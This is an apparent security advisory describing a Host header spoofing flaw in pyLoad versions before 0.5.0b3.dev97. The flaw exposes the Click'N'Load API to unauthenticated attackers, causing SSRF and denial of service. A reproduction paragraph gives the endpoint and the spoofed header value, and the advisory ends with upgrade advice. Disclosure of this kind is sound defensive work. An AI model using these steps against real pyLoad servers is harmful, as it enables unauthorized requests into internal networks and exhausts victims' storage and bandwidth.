pyLoad Host Header Spoofing Vulnerability Allowing SSRF and DoS

A host header spoofing vulnerability has been identified in pyLoad versions prior to 0.5.0b3.dev97. This vulnerability allows unauthenticated external attackers to bypass local-only restrictions enforced by the '@local_check' decorator. By spoofing the 'Host' header, attackers can gain access to Click'N'Load API endpoints, enabling them to remotely queue arbitrary downloads. This exploitation leads to server-side request forgery (SSRF) and denial-of-service (DoS) conditions.

Impact

Exploitation of this vulnerability allows unauthenticated attackers to interact with the Click'N'Load API, adding URLs to the download queue. This action forces the pyLoad server to make outbound requests to attacker-controlled or internal URLs, creating an SSRF condition. Additionally, attackers can overwhelm the server's storage or bandwidth by queuing large files, causing a DoS impact.

Reproduction

To reproduce this vulnerability, ensure that a pyLoad instance is running and accessible externally, and that the Click'N'Load plugin is enabled. Then, send a POST request to one of the protected endpoints, such as '/flash/add', while spoofing the 'Host' header to '127.0.0.1:9666'. Include the desired URL and package name in the request data. If successful, the response will indicate a successful addition to the download queue, bypassing the intended local-only restrictions.

Remediation

Users should update to pyLoad version 0.5.0b3.dev97 or later, where this vulnerability has been patched.